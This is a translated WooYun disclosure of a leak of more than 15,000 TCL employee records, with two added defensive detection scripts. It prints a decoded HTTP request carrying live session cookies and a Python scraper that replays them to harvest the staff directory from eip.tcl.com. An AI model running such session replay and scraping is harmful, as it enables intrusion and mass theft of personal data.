Vulnerability summary

Defect ID: wooyun-2015-0141726

Title: github-hacker: leak of information on more than 15,000 TCL employees (a new git-leak scenario)

Vendor: TCL官方网上商城 (TCL official online store)

Author: 纳米翡翠

Submitted: 2015-09-17 11:49

Fixed: 2015-11-01 14:38

Published: 2015-11-01 14:38

Vulnerability type: large-scale leak of user data

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-17: details sent to the vendor, awaiting vendor handling
2015-09-17: vendor confirmed; details disclosed to the vendor only
2015-09-27: details disclosed to core white hats and domain experts
2015-10-07: details disclosed to regular white hats
2015-10-17: details disclosed to intern white hats
2015-11-01: details disclosed to the public

Brief description:

Information on every TCL employee leaked, including position, name, telephone number, address and email.

Detailed description:

1. A GitHub search turned up the following:
https://github.com/s3cu1n4/mycode/blob/master/temp/test.txt

[Screenshot: QQ截图20150917113353.jpg]


After base64 decoding, the contents are:

GET /phones/ViewInfo.aspx?RoleNo=0101&page=1 HTTP/1.1
Host: eip.tcl.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36
DNT: 1
Referer: http://eip.tcl.com/phones/ViewInfo.aspx?RoleNo=0101&page=2
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Cookie: JAAPSESSIONID=JPlpuPM8OPkWbkkokqs6pTPNiGzNCMPz; Proxy_user=LPGhRYaM8EK9GzmisfwsXTHNwtjGdpqEVpdpwdv6VBR85Wqzfal4wrBkTliCC37B; LtpaToken2=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; LtpaToken=EndxvXShVNqSXQ1doiNyTvMWR6Y/X7J+5Bhs9cvrb541MCG5lJXu/8gxhhJlvnyfFYnGk2p+2thMr5a2qOpl7PaarQ5jSZySXsWUay1nPIUV0+0nsgDweLKsyM2p+w76P0onwZgcDBCObVl2N9wVdghK/nCZ3oGtbd+RAtA7j2ovVqxjJ4kDjy/UMML1tbb73c8zC6dPh05FI8ge89sqgnDwwhcVNaACG+fF7h7OCrEhJA1IQMSy9SCP8CrQ9Vw5Xs4IwXkzwyFptCgAxegMZIdhG92p9gRbNvdra43+SxsxUq3D+jW4jXxiWV5qCy9gifWfxqFx9sE1+mB3Q+nRG66+IT+meski/nD3KkRaBqq+b2HfL/gv7fDaVD5D15poiNtjAqip6KQ6MudME14VQtrw2NWyY6hg+G0IW+C55A5gsBBGbpuzJn8AS0a8kdAwTAECd1Vi1fBCKyPwGiHGAA==; ASP.NET_SessionId=1f44ueqbxxqb54fdk5lj4czv
Connection: close


Copy the cookie into a browser and open the URL from the request, and you are straight into the EIP.
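What leaked here is not a plain-text password but a whole HTTP request, base64-encoded, with live session cookies inside it; a secret scanner that only greps for literal key patterns never sees the Cookie header. The following Python 3 script is an added example, not code from the original report, from TCL or from WooYun: it scans a file's text for base64 runs, decodes each one, and flags any that decodes to an HTTP request carrying a Cookie or Authorization header, reporting the Host and the cookie names but never the values. The sample file content, the host eip.example.invalid and the cookie values are constructed for the example; the request path is the one from the report.

```python
import base64
import binascii
import re

# A base64 run long enough to hold an HTTP request line plus a few headers.
B64_RUN = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')
REQUEST_LINE = re.compile(
    r'^(?:GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) \S+ HTTP/1\.[01]\r?$', re.M)
# Headers whose presence means the decoded request carries a credential.
SENSITIVE_HEADERS = ('cookie', 'authorization', 'proxy-authorization', 'x-api-key')


def decode_candidate(blob):
    """Decode one base64 run to text; None if it is not valid base64 or not UTF-8."""
    padded = blob + '=' * (-len(blob) % 4)      # restore padding the writer may have dropped
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode('utf-8')
    except UnicodeDecodeError:
        return None


def parse_headers(request_text):
    """Return {lowercased-name: value} for the header block of a raw HTTP request."""
    headers = {}
    for line in request_text.splitlines()[1:]:   # skip the request line
        if not line.strip():                      # blank line ends the header block
            break
        name, sep, value = line.partition(':')
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def findings_in_text(text):
    """Find base64 runs that decode to an HTTP request with a credential-bearing header.

    A finding records the offset, the Host header, which sensitive headers were
    present and the cookie *names*; cookie values are deliberately not copied out.
    """
    findings = []
    for m in B64_RUN.finditer(text):
        decoded = decode_candidate(m.group(0))
        if decoded is None or not REQUEST_LINE.search(decoded):
            continue
        headers = parse_headers(decoded)
        hits = [h for h in SENSITIVE_HEADERS if h in headers]
        if not hits:
            continue
        cookie_names = [c.split('=', 1)[0].strip()
                        for c in headers.get('cookie', '').split(';') if c.strip()]
        findings.append({
            'offset': m.start(),
            'host': headers.get('host', '?'),
            'headers': hits,
            'cookie_names': cookie_names,
        })
    return findings


# Constructed sample: a notes file with a pasted base64 blob, like the test.txt in the
# report, but with a fake host and fake cookie values. The hex digest line shows that
# an ordinary long hex string is not reported.
_FAKE_REQUEST = (
    'GET /phones/ViewInfo.aspx?RoleNo=0101&page=1 HTTP/1.1\r\n'
    'Host: eip.example.invalid\r\n'
    'Cookie: ASP.NET_SessionId=EXAMPLE0000000000000000; LtpaToken=EXAMPLETOKEN==\r\n'
    'Connection: close\r\n'
    '\r\n'
)
SAMPLE_FILE = (
    'temp notes\n'
    + base64.b64encode(_FAKE_REQUEST.encode()).decode()
    + '\nsha256 of the build: 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef\n'
)


def scan_sample():
    return findings_in_text(SAMPLE_FILE)


if __name__ == '__main__':
    for f in scan_sample():
        print('offset %d: request to %s carries %s (cookie names: %s)'
              % (f['offset'], f['host'], ', '.join(f['headers']), ', '.join(f['cookie_names'])))
```

Run it as a pre-commit hook over staged files, or over a repository history with `git log -p`, and treat any finding as a credential exposure: the cookies must be invalidated server-side, because rewriting the commit does nothing for a token that was already public. The regex matches one unbroken run, so a blob that was line-wrapped at 76 columns needs its newlines stripped before scanning.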

[Screenshot: QQ截图20150917113732.jpg]


The full TCL employee directory is laid bare.
Write a script to crawl the data:

    #coding:utf-8
    # Python 2 (urllib2). Walks the EIP phone directory page by page with the leaked
    # session cookie and appends each record's flashvars string to tclinfo.txt.
    import re
    import urllib2
    import threading

    start = 1
    end = 880
    counter_lock = threading.Lock()   # guards the shared page counter across threads
    write_lock = threading.Lock()     # serialises appends to the output file
    pattern1 = re.compile(r'<param name="flashvars" value="(.*?)">')

    def getContent(respInfo):
        match1 = pattern1.findall(respInfo)
        if not match1:                 # page without a record block
            return
        info = match1[0]
        if info == ',,,,, ':           # empty record
            print "--"
        else:
            writeFile(info)

    def writeFile(info):
        with write_lock:
            with open("tclinfo.txt", 'a') as fd:
                fd.write(info + '\r\n')

    def request(page):
        print page
        try:
            Url = "http://eip.tcl.com/phones/ViewInfo.aspx?RoleNo=0101&page=%s" % page
            req = urllib2.Request(Url)
            req.add_header('User-Agent', "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 OPR/29.0.1795.60 (Edition Baidu)")
            req.add_header('Accept', '*/*')
            req.add_header('Cookie', 'ASP.NET_SessionId=1f44ueqbxxqb54fdk5lj4czv; LtpaToken=EndxvXShVNqSXQ1doiNyTvMWR6Y/X7J+5Bhs9cvrb541MCG5lJXu/8gxhhJlvnyfFYnGk2p+2thMr5a2qOpl7PaarQ5jSZySXsWUay1nPIUV0+0nsgDweLKsyM2p+w76P0onwZgcDBCObVl2N9wVdghK/nCZ3oGtbd+RAtA7j2ovVqxjJ4kDjy/UMML1tbb73c8zC6dPh05FI8ge89sqgnDwwhcVNaACG+fF7h7OCrEhJA1IQMSy9SCP8CrQ9Vw5Xs4IwXkzwyFptCgAxegMZIdhG92p9gRbNvdra43+SxsxUq3D+jW4jXxiWV5qCy9gifWfxqFx9sE1+mB3Q+nRG66+IT+meski/nD3KkRaBqq+b2HfL/gv7fDaVD5D15poiNtjAqip6KQ6MudME14VQtrw2NWyY6hg+G0IW+C55A5gsBBGbpuzJn8AS0a8kdAwTAECd1Vi1fBCKyPwGiHGAA==')
            resp = urllib2.urlopen(req)
            respInfo = resp.read().replace("\r", "").replace("\n", "")
        except Exception as e:
            print "page %s failed: %s" % (page, e)
            return                     # respInfo is unbound on failure; do not parse it
        getContent(respInfo)

    def main():
        global end
        while True:
            with counter_lock:         # each page is fetched by exactly one thread
                if end <= start:
                    return
                end = end - 1
                page = end
            request(page)

    def thread():
        a = threading.Thread(target=main)
        a.start()

    if __name__ == '__main__':
        for t in range(1, 10):
            thread()


This crawls every record; after cleaning up the data, you have all the user information, more than 15,000 entries in total.
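A crawl like this is loud on the server side: one client walks every page of a single directory endpoint, in descending order, in a few minutes. The following Python 3 script is an added example, not code from the report or the vendor: it parses access-log lines in common log format, groups requests to the directory page by client IP, and flags any client that retrieved at least min_pages distinct page values inside a sliding window_s-second window. The log lines, IPs and timestamps are constructed for the example; the path /phones/ViewInfo.aspx and the page parameter are the ones from the report.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Common log format: ip ident user [time] "METHOD target HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+$')
TS_FMT = '%d/%b/%Y:%H:%M:%S %z'


def parse_line(line):
    """Parse one access-log line; return None for lines that do not fit the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('target'))
    qs = parse_qs(url.query)
    return {
        'ip': m.group('ip'),
        'ts': datetime.strptime(m.group('ts'), TS_FMT),
        'path': url.path,
        'page': qs.get('page', [None])[0],   # the paginated-directory parameter
        'status': int(m.group('status')),
    }


def find_enumerators(lines, path='/phones/ViewInfo.aspx', min_pages=8, window_s=60):
    """Return {ip: max_distinct_pages} for clients that fetched at least min_pages
    distinct page values of `path` (HTTP 200) inside any window_s-second window."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec['path'] == path and rec['page'] is not None and rec['status'] == 200:
            per_ip[rec['ip']].append((rec['ts'], rec['page']))

    flagged = {}
    for ip, events in per_ip.items():
        events.sort()                         # by timestamp
        best, left = 0, 0
        for right in range(len(events)):
            # slide the left edge until the window is at most window_s wide
            while (events[right][0] - events[left][0]).total_seconds() > window_s:
                left += 1
            distinct = len({page for _, page in events[left:right + 1]})
            best = max(best, distinct)
        if best >= min_pages:
            flagged[ip] = best
    return flagged


# Constructed sample: one client walks pages 879 down to 868 in twelve seconds
# (the scraper's pattern); another browses two pages over half a minute.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Sep/2015:11:40:%02d +0800] '
    '"GET /phones/ViewInfo.aspx?RoleNo=0101&page=%d HTTP/1.1" 200 5120' % (i, 879 - i)
    for i in range(12)
] + [
    '10.0.0.9 - - [17/Sep/2015:11:41:10 +0800] "GET /phones/ViewInfo.aspx?RoleNo=0101&page=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [17/Sep/2015:11:41:35 +0800] "GET /phones/ViewInfo.aspx?RoleNo=0101&page=2 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [17/Sep/2015:11:42:00 +0800] "GET /login.aspx HTTP/1.1" 200 1200',
]


if __name__ == '__main__':
    for ip, n in find_enumerators(SAMPLE_LOG).items():
        print('%s fetched %d distinct directory pages within 60 s' % (ip, n))
```

Keying on the client IP is what an ordinary access log allows; if the application logs a session identifier or the authenticated user, key on that instead, since the replayed cookie ties every request here to one legitimate account, which is the signal that the session itself has been stolen and should be revoked.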

[Screenshot: QQ截图20150917114025.jpg]

Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, please credit 纳米翡翠@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-09-17 14:37

Vendor reply:

Hello. This system has already been decommissioned, although it has not yet been taken offline. Thank you for your attention to TCL!

Latest status:

None


Vulnerability rating:

Comments

  1. 2015-09-17 11:51 | 疯狗 verified white hat ( intern white hat | Rank:44 vulnerabilities:2 | Having read every vulnerability under heaven, the heart is naturally unobscured. )

    Interesting. Not a direct leak; the author was very observant.